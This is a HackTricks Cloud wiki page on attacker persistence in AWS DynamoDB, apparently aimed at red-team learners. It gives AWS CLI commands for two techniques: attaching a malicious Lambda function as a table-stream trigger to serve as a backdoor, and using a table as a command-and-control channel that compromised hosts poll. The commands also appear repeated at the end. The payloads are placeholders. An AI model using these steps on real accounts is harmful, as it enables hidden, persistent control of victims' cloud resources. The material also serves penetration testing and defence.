AWS - DynamoDB Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

DynamoDB

For more information access:

AWS - DynamoDB Enum

DynamoDB Triggers with Lambda Backdoor

Using DynamoDB triggers, an attacker can create a stealthy backdoor by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.

# Create a malicious Lambda function
aws lambda create-function \
    --function-name MaliciousFunction \
    --runtime nodejs14.x \
    --role <LAMBDA_ROLE_ARN> \
    --handler index.handler \
    --zip-file fileb://malicious_function.zip \
    --region <region>

# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
    --table-name TargetTable \
    --region <region>

# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
    --function-name MaliciousFunction \
    --event-source <STREAM_ARN> \
    --region <region>

To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.

DynamoDB as a C2 Channel

An attacker can use a DynamoDB table as a command and control (C2) channel by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.

# Create a DynamoDB table for C2
aws dynamodb create-table \
    --table-name C2Table \
    --attribute-definitions AttributeName=CommandId,AttributeType=S \
    --key-schema AttributeName=CommandId,KeyType=HASH \
    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
    --region <region>

# Insert a command into the table
aws dynamodb put-item \
    --table-name C2Table \
    --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
    --region <region>

The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Cognito Persistence NextAWS - EC2 Persistence

Last updated 4 months ago

# Create a malicious Lambda function aws lambda create-function \ --function-name MaliciousFunction \ --runtime nodejs14.x \ --role <LAMBDA_ROLE_ARN> \ --handler index.handler \ --zip-file fileb://malicious_function.zip \ --region <region> # Associate the Lambda function with the DynamoDB table as a trigger aws dynamodbstreams describe-stream \ --table-name TargetTable \ --region <region> # Note the "StreamArn" from the output aws lambda create-event-source-mapping \ --function-name MaliciousFunction \ --event-source <STREAM_ARN> \ --region <region>

# Create a DynamoDB table for C2 aws dynamodb create-table \ --table-name C2Table \ --attribute-definitions AttributeName=CommandId,AttributeType=S \ --key-schema AttributeName=CommandId,KeyType=HASH \ --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ --region <region> # Insert a command into the table aws dynamodb put-item \ --table-name C2Table \ --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ --region <region>